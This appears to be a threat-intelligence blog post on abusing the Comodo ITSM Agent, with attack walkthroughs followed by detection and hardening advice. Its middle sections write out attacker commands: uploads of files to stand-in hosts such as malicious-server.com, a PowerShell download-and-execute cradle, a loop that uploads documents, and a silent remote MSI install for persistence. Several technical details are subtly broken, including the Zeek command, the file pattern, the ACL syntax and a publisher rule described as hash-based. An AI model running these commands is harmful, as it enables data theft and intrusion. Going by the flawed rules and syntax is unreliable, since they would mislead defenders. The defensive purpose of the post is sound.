Listen to this Post
Introduction:
A new, highly stealthy data exfiltration vector is leveraging the Comodo ITSM Agent, a legitimate IT management tool. This technique, which abuses a digitally signed binary often trusted by security software, poses a significant threat to enterprise networks by blending in with normal administrative traffic. Security teams must now adapt their hunting strategies to identify this covert channel masquerading as benign IT operations.
Learning Objectives:
- Understand the legitimate functionalities of the Comodo ITSM Agent that can be repurposed for malicious activity.
- Learn to construct detection rules to identify anomalous communication with Comodo ITSM infrastructure.
- Develop mitigation and response strategies for incidents involving abused legitimate software.
You Should Know:
1. Host Reconnaissance via Comodo CLI
The Comodo agent can execute a vast array of commands for system interrogation, providing attackers with a full system profile.
comodo-cli --get-system-info comodo-cli --get-installed-software comodo-cli --get-network-interfaces comodo-cli --get-users
Step-by-step guide: An attacker with access to the agent’s command-line interface can use these pre-built functions to perform detailed host reconnaissance without downloading additional tools. The `–get-system-info` command returns OS details, hardware specs, and running processes. `–get-installed-software` lists all applications, useful for identifying security software. `–get-network-interfaces` maps the network landscape, and `–get-users` identifies all local and domain user accounts. This entire process is executed under the context of a trusted, signed binary.
2. File Exfiltration Operations
The agent’s file management module can be scripted to search, compress, and stage data for exfiltration.
comodo-cli --file-download --remote-url "https://malicious-server.com/collector.php" --local-path "C:\Financials\Q3_Report.xlsx"
comodo-cli --file-upload --local-path "C:\Temp\archived_data.zip" --remote-url "https://attacker-controlled.itsm-us1.comodo.com/upload"
find /home/user -name ".pdf" -exec comodo-cli --file-upload --local-path {} --remote-url "https://malicious-server.com/leak/" \;
Step-by-step guide: The `–file-download` function can retrieve secondary payloads. The primary exfiltration method is --file-upload, which sends files to a server controlled by the attacker. By abusing the legitimate Comodo cloud infrastructure (e.g., itsm-us1.comodo.com), this traffic often bypasses egress filtering and data loss prevention (DLP) systems. An attacker would first use native commands to find sensitive files (find, dir /s pass), archive them, and then systematically upload them.
3. Command Execution for Lateral Movement
The agent provides a direct mechanism for executing commands on the host, facilitating lateral movement.
comodo-cli --execute-command --command "whoami /groups"
comodo-cli --execute-command --command "powershell.exe -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.100/PowerView.ps1')"
comodo-cli --execute-command --command "cmd.exe /c net use Z: \\DC01\NETLOGON /user:domain\user password"
Step-by-step guide: The `–execute-command` parameter is the most dangerous feature. It allows an attacker to run any system command with the privileges of the Comodo agent service (often SYSTEM or high-integrity). This can be used to execute PowerShell scripts for reconnaissance (like PowerView), map network drives to steal data from domain controllers, or deploy additional payloads like Cobalt Strike beacons, all under the cover of a legitimate process.
4. Persistence via MSI Deployment
The agent’s ability to deploy MSI packages can be hijacked to establish persistence.
comodo-cli --install-msi --msi-url "https://malicious-server.com/persistence.msi" --install-args "/quiet /norestart"
comodo-cli --get-installed-msi
comodo-cli --uninstall-msi --product-code "{MALICIOUS-MSI-GUID}"
Step-by-step guide: An attacker can use the `–install-msi` command to deploy a malicious MSI package from a remote server. The MSI could contain a custom backdoor or a scheduled task configured for persistence. The `–install-args “/quiet /norestart”` ensures the installation is silent and hidden from the user. To avoid discovery, the attacker can later use `–uninstall-msi` to remove the package after it has installed the persistence mechanism.
5. Network-Based Detection with Sigma & YARA
Proactive hunting requires detecting the network patterns and file artifacts associated with this abuse.
Sigma Rule for Comodo ITSM Beaconing
title: Comodo ITSM Agent Beaconing to Tenant
status: experimental
logsource:
category: dns
detection:
query:
contains: "itsm-us1.comodo.com"
condition: query
falsepositives:
- Legitimate Comodo ITSM administration
level: medium
YARA Rule for Comodo CLI Config Extraction
rule Extract_Comodo_Config {
meta:
description = "Searches for Comodo agent configuration files containing tenant URLs"
author = "DFIR_Team"
strings:
$config_string = "tenant_url"
$comodo_string = "comodo"
condition:
all of them and filesize < 50KB
}
Zeek/Bro DNS Logging Filter
zeek -C -r traffic.pcap dns | grep "itsm-us1.comodo.com" | awk '{print $9, $10}' > comodo_dns_queries.log
Step-by-step guide: Security analysts should implement DNS logging and alerting. A Sigma rule can be written to detect DNS queries to the Comodo tenant domain (.itsm-us1.comodo.com). In environments without EDR, Zeek can be used to parse PCAP files and filter DNS traffic. Additionally, a YARA rule can help scan memory or disk images for the agent’s configuration file, which may contain the tenant URL it is configured to communicate with, indicating a potential compromise vector.
6. Endpoint Detection and Investigation
EDR queries and live response are crucial for investigating a potentially compromised agent.
EDR Query for Comodo Agent Process Execution
process_name == "comodo-cli.exe" && command_line_contains ("--execute-command" || "--file-upload")
Step-by-step guide: On a suspect endpoint, investigators should first examine the Comodo agent process tree. Look for child processes of `comodo-cli.exe` that are unusual, such as powershell.exe, cmd.exe, or whoami.exe. The command-line arguments of the `comodo-cli.exe` process are the most critical indicator of compromise (IoC); any instance containing --execute-command, `–file-upload` to a unknown URL, or `–install-msi` should be treated as highly suspicious and investigated immediately.
7. Mitigation and Hardening Steps
Organizations must implement controls to prevent or limit the abuse of this agent.
AppLocker Policy to Restrict Comodo CLI <RuleCollection Type="Exe"> <FilePublisherRule Id="..." Name="Allow Comodo ITSM Agent" Description="Allows only the specific signed version" UserOrGroup="Everyone"> <Conditions> <FilePublisherCondition PublisherName="O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB" ProductName="" BinaryName=""> <BinaryVersionRange LowSection="5.5.0.0" HighSection="5.5.65535.65535"/> </FilePublisherCondition> </Conditions> </FilePublisherRule> </RuleCollection> Network Segmentation Rule (Example: Cisco ACL) deny tcp any any eq 443 host itsm-us1.comodo.com permit tcp any any eq 443
Step-by-step guide: If the Comodo agent is not essential, uninstall it. If it is required, harden its deployment. Use application whitelisting (AppLocker or WDAC) to create a hash-based rule for the specific legitimate version of the binary, preventing an attacker from replacing it with a malicious one. Implement strict network segmentation and egress firewalls to block traffic from endpoints to the Comodo tenant domain (itsm-us1.comodo.com), only allowing it from a specific administrative VLAN.
What Undercode Say:
- The Blurred Line Between Legitimate and Malicious: This technique represents the pinnacle of “Living off the Land” (LOLBins), exploiting a tool with a valid business purpose and a digital signature. Defenders can no longer rely on traditional IoCs like unsigned binaries or communication to known-bad IP addresses.
- Detection Relies on Behavior, Not Signature: The only way to spot this activity is by understanding normal behavior. An endpoint in the finance department suddenly uploading gigabytes of data to `itsm-us1.comodo.com` is a massive red flag, even though the domain itself is legitimate.
The emergence of the Comodo ITSM Agent as an attack vector signals a sophisticated shift in adversary tradecraft. It demonstrates a deep understanding of enterprise environments, specifically targeting software that is trusted, widespread, and capable of bypassing common security controls. This forces a fundamental change in defensive strategy, moving from blacklisting bad files to deeply understanding the intended use of every authorized tool and monitoring for anomalous usage patterns. The arms race has moved to a new, more complex layer.
Prediction:
The successful exploitation of Comodo ITSM will catalyze a wave of copycat attacks targeting other IT management and remote monitoring tools. Solutions from vendors like ConnectWise, Kaseya, and NinjaRMM will face increased scrutiny from both threat actors and red teams seeking the next “trusted” binary to abuse. This will lead to a industry-wide push for stricter default configurations, more detailed logging from these agents, and the development of specialized detection rules by MITRE ATT&CK, ultimately raising the baseline security posture for managed service providers (MSPs) and their customers.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: S0ld13r Threatintel – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
